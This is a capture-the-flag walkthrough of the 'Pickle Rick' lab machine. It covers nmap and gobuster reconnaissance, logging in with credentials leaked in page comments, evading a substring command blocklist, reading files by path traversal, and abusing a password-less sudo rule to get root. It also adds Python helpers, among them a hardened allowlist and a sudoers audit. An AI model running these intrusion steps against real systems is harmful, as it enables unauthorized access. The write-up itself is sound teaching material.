
Reconnaissance
Port Scan
First we run a port scan to see which ports are open:
nmap -p- --open -sS --min-rate 5000 -n -vvv -Pn 10.66.167.244 -oG allPorts
-p-: Scan all 65535 ports
--open: Show only open ports
-sS: TCP SYN scan (stealth scan)
--min-rate 5000: Send packets no slower than 5000 per second
-n: No DNS resolution
-vvv: Very verbose output
-Pn: Skip host discovery (treat the host as online)
-oG allPorts: Save results in grepable format to a file named "allPorts"
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 62
80/tcp open http syn-ack ttl 62
Now we scan the version of the service behind each open port and run the default recon scripts:
nmap -p22,80 --open -sCV 10.66.167.244 -oN target
-p22,80: Scan only ports 22 and 80
--open: Show only open ports
-sC: Run the default NSE scripts for reconnaissance
-sV: Detect service versions on open ports
-oN target: Save output in normal format to a file named "target"
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dd:6c:c5:1c:c9:f3:ac:7e:b1:3e:cb:32:ec:36:82:3d (RSA)
| 256 a9:93:14:67:cb:0f:20:ff:45:43:d9:bd:54:2d:a9:fa (ECDSA)
|_ 256 8a:f7:85:4e:51:09:78:c9:3d:c1:79:b5:49:0f:25:67 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
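The two scans above are one procedure: the first writes a grepable results file, and the open ports it finds become the -p list of the second. As an added example (not code from the original write-up), the following Python parses an nmap -oG file and builds that argument. The file contents are a constructed sample in nmap's grepable layout, using the IP and ports from the scan above.

```python
import re

# Constructed sample of what the first scan writes to "allPorts" (-oG format).
# IP and ports match the scan on this page; the layout is nmap's standard
# grepable output: one "Host:" line per host, tab-separated fields.
SAMPLE_ALLPORTS = (
    "# Nmap scan initiated as: nmap -p- --open -sS --min-rate 5000 -n -vvv -Pn "
    "10.66.167.244 -oG allPorts\n"
    "Host: 10.66.167.244 ()\tStatus: Up\n"
    "Host: 10.66.167.244 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///"
    "\tIgnored State: closed (65533 ports)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)

# Each port entry is port/state/protocol/owner/service/rpcinfo/version/
PORT_ENTRY = re.compile(r"^(\d+)/(\w+)/(\w+)/")


def parse_grepable(text):
    """Map each host IP to a list of (port, state, protocol) tuples."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("Ignored State:")[0]
        for item in ports_field.split(","):
            match = PORT_ENTRY.match(item.strip())
            if match:
                port, state, proto = match.groups()
                hosts.setdefault(ip, []).append((int(port), state, proto))
    return hosts


def open_ports_arg(text, ip):
    """Build the value for -p in the follow-up scan, e.g. '22,80'."""
    ports = sorted(
        port
        for port, state, proto in parse_grepable(text).get(ip, [])
        if state == "open" and proto == "tcp"
    )
    return ",".join(str(p) for p in ports)


def follow_up_scan(text, ip, outfile="target"):
    """argv for the second scan on this page, ready for subprocess.run."""
    return ["nmap", "-p" + open_ports_arg(text, ip), "--open", "-sCV", ip, "-oN", outfile]


if __name__ == "__main__":
    print(" ".join(follow_up_scan(SAMPLE_ALLPORTS, "10.66.167.244")))
```

Run against the real allPorts file by reading it into `text`; hosts with no open ports produce an empty -p value, so check for that before launching the second scan.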
Web scan
We run directory and file discovery with gobuster:
gobuster dir -u http://10.66.167.244/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,log,db,bck -t 200 2>/dev/null
dir: Directory/file enumeration mode
-u: Target URL to scan
-w: Path to the wordlist used for brute-forcing
-x: File extensions to append to each word in the wordlist
-t: Number of concurrent threads
2>/dev/null: Redirect error messages to the null device (suppress errors)
login.php (Status: 200) [Size: 882]
assets (Status: 301) [Size: 315] [--> http://10.66.167.244/assets/]
portal.php (Status: 302) [Size: 0] [--> /login.php]
robots.txt (Status: 200) [Size: 17]
Let's see what is inside each file or directory:
login.php - A simple login page with nothing of interest in the source code
assets - A listing of the web's static files, but nothing interesting
portal.php - Redirects to the login page
robots.txt - We only see the following content:
Wubbalubbadubdub
Web Source Code
In the source code we find something really interesting:
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
And the web title, Rick is sup4r cool, gives us another clue.
So, with all this info, we try to log in as the user R1ckRul3s, testing the passwords Rick is sup4r cool and Wubbalubbadubdub.
And there we go, we are logged in.
First Ingredient
We see that the only page we have access to (the rest are restricted to the real Rick) is a command page where we can execute commands on the system.
But don't get too excited: all the useful commands are banned.
With the command ls we see the following:
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
We can't use cat to read the files, but we can use the command strings, which prints the printable character sequences in a file, so on a text file it gives practically the same result.
So we can read the first ingredient with that command.
Second Ingredient
If we read the file portal.php and intercept the request with Burp Suite, we can see which function is blocking us from executing commands:
<?php
function contains($str, array $arr)
{
    foreach($arr as $a) {
        if (stripos($str,$a) !== false) return true;
    }
    return false;
}

// Cant use cat
$cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");

if(isset($_POST["command"])) {
    if(contains($_POST["command"], $cmds)) {
        echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
    } else {
        // anything that passes the substring check goes straight to the shell
        $output = shell_exec($_POST["command"]);
        echo "</br><pre>$output</pre>";
    }
}
?>
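Two things in this portal.php deserve a closer look: contains() is a case-insensitive substring blocklist, which is why strings (used above to read the first ingredient) passes while a harmless command such as locate is blocked for containing "cat"; and whatever passes goes straight to shell_exec(). The following Python is an added example, not code from the room or the write-up: it ports contains() so the blocklist behaviour can be checked, and sets beside it the design a defender would use instead, an exact-name allowlist (ALLOWED, an assumed set of programs) executed without a shell. The command strings are constructed from the file names listed above.

```python
import shlex
import subprocess

# Banned-substring list copied from the portal.php shown above.
BANNED = ["cat", "head", "more", "tail", "nano", "vim", "vi"]


def contains(command, banned=BANNED):
    """Python port of the PHP contains(): stripos() is a case-insensitive
    substring search, so a command is blocked only if a banned word appears
    anywhere in its text."""
    lowered = command.lower()
    return any(word.lower() in lowered for word in banned)


# Hardened alternative (assumed design, not from the page): exact program
# names the portal is meant to expose, run without a shell so that ';', '|'
# and redirections are never interpreted.
ALLOWED = {"ls", "pwd", "whoami"}


def build_safe_argv(command, allowed=ALLOWED):
    """Return the argv to execute, or None when the request is not permitted."""
    try:
        argv = shlex.split(command)
    except ValueError:      # unbalanced quotes
        return None
    if not argv or argv[0] not in allowed:
        return None
    # Operands must stay inside the web root: no absolute paths, no '..'.
    for arg in argv[1:]:
        if not arg.startswith("-") and (arg.startswith("/") or ".." in arg):
            return None
    return argv


def run_safe(command, cwd="."):
    """Execute only what build_safe_argv() approves; shell=False throughout."""
    argv = build_safe_argv(command)
    if argv is None:
        return "Command not permitted"
    result = subprocess.run(argv, cwd=cwd, capture_output=True, text=True, timeout=5)
    return result.stdout + result.stderr


if __name__ == "__main__":
    for cmd in ("cat clue.txt", "strings clue.txt", "locate clue.txt"):
        print(f"{cmd!r:28} blocked by blocklist: {contains(cmd)}")
    for cmd in ("ls -la", "ls; whoami", "strings clue.txt", "ls ../../../home/rick/"):
        print(f"{cmd!r:28} allowlist argv: {build_safe_argv(cmd)}")
```

The blocklist both misses (strings) and over-blocks (locate), which is the usual fate of substring filters on shell input. The allowlist decides on the first token only after shlex has split the input, and shell=False means a trailing "; whoami" becomes a literal, rejected token rather than a second command.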
This is nice to see, but not enough.
Below this file, we see a base64 string in an HTML comment:
<!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
Which we can decode at https://gchq.github.io/CyberChef/
But after multiple base64 decodes, we get to the message rabbit hole 🙁
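CyberChef's repeated decoding can also be scripted. The following Python is an added example, not part of the write-up: it peels nested base64 one layer at a time until the result is no longer base64 text, and it first normalizes padding, because the comment above ends in an extra "=" that makes its length invalid for a strict decoder. The page's string is included as input; the nested sample used to check the function is constructed here with make_nested_sample().

```python
import base64
import binascii
import re

# The HTML comment from the page, exactly as shown above.
PAGE_COMMENT = (
    "Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NH"
    "VkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0=="
)

BASE64_TEXT = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def normalize_padding(s):
    """Drop surrounding whitespace and any '=' padding, then re-pad to a
    multiple of four. Repairs strings with stray or missing padding."""
    s = s.strip().rstrip("=")
    return s + "=" * (-len(s) % 4)


def peel_base64(s, max_layers=20):
    """Decode repeatedly while each result is printable base64 text.
    Returns (innermost_text, number_of_layers_decoded)."""
    current = s.strip()
    layers = 0
    while layers < max_layers:
        candidate = normalize_padding(current)
        if not BASE64_TEXT.match(candidate):
            break
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        decoded = decoded.strip()
        if not decoded or not decoded.isprintable():
            break
        current = decoded
        layers += 1
    return current, layers


def make_nested_sample(text, layers):
    """Constructed test input: `text` base64-encoded `layers` times."""
    data = text.encode("utf-8")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


if __name__ == "__main__":
    text, n = peel_base64(PAGE_COMMENT)
    print(f"{n} layer(s) decoded -> {text!r}")
```

The loop stops on the first layer that is not printable UTF-8, so binary payloads are left encoded rather than mangled; max_layers guards against input that keeps decoding to valid base64 forever.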
Now we read clue.txt, which tells us to search the whole system. To do this, we run ls -la ../ to move up through the directories and list their files.
After searching, we find the second ingredient in the /home/rick/ directory and read it with:
strings ../../../home/rick/second*
Last ingredient
Last but not least, we will find the third ingredient.
If we run sudo -l we see this amazing output:
User www-data may run the following commands on ip-10-66-180-22:
(ALL) NOPASSWD: ALL
So basically, we can execute anything as root.
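The mitigation side of this finding is to review sudoers for exactly this pattern. As an added example (not from the write-up), the following Python parses sudo -l output and flags rules that hand a service account password-less or unrestricted root. The sample output is constructed: the two rule lines are the ones shown above, the Defaults lines follow sudo's usual layout, and the list of service account names is an assumption.

```python
import re

# Constructed sample of `sudo -l` output: the "User ... may run" line and
# the "(ALL) NOPASSWD: ALL" rule are the ones shown on this page, the
# Defaults lines are in sudo's usual layout.
SAMPLE_SUDO_L = """Matching Defaults entries for www-data on ip-10-66-180-22:
    env_reset, mail_badpass

User www-data may run the following commands on ip-10-66-180-22:
    (ALL) NOPASSWD: ALL
"""

USER_LINE = re.compile(r"^User (\S+) may run the following commands")
# A rule line: (runas[:rungroup]) [TAG: ...] command list
RULE_LINE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text):
    """Return (username, [ {runas, tags, cmds}, ... ]) from sudo -l output."""
    user, rules, in_rules = None, [], False
    for line in text.splitlines():
        m = USER_LINE.match(line)
        if m:
            user, in_rules = m.group(1), True
            continue
        if not in_rules or not line.strip():
            continue
        r = RULE_LINE.match(line)
        if r:
            tags = [t for t in r.group("tags").replace(" ", "").split(":") if t]
            rules.append({
                "runas": r.group("runas").strip(),
                "tags": tags,
                "cmds": r.group("cmds").strip(),
            })
    return user, rules


# Accounts that should never hold sudo rights (assumed list for the example).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "httpd"}


def audit_sudo_rules(text, service_accounts=SERVICE_ACCOUNTS):
    """Findings for rules that hand out unrestricted or password-less root."""
    user, rules = parse_sudo_l(text)
    findings = []
    for rule in rules:
        if rule["cmds"] == "ALL":
            findings.append(f"{user}: may run ANY command as ({rule['runas']})")
        if "NOPASSWD" in rule["tags"]:
            findings.append(f"{user}: no password required for '{rule['cmds']}'")
    if user in service_accounts and rules:
        findings.append(f"{user}: service account should have no sudo rules at all")
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L):
        print(finding)
```

On the machine above every check fires. The fix is simply to delete the rule: a web server account has no business in sudoers, and a narrow rule for a specific binary without NOPASSWD is the most that an operator account should get.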
We look for the flag in the root directory:
sudo ls -la ../../../root/
And read it:
sudo strings ../../../root/3rd.txt
And there we go, the 3 ingredients.
Conclusion
This Pickle Rick machine demonstrated fundamental web exploitation and privilege escalation techniques. The challenge began with reconnaissance using nmap and gobuster, revealing critical information through source code comments and the robots.txt file. By leveraging basic command injection vulnerabilities in the web portal and identifying weak restrictions on banned commands, we successfully retrieved all three ingredients. The final privilege escalation was straightforward due to unrestricted sudo permissions for the www-data user, highlighting the importance of proper access controls. Overall, this CTF provided excellent practice in web enumeration, command injection bypass techniques, and understanding Linux privilege escalation through misconfigured sudo permissions.
Video Walkthrough
Here you have a Spanish video from my YouTube channel with the walkthrough of this machine: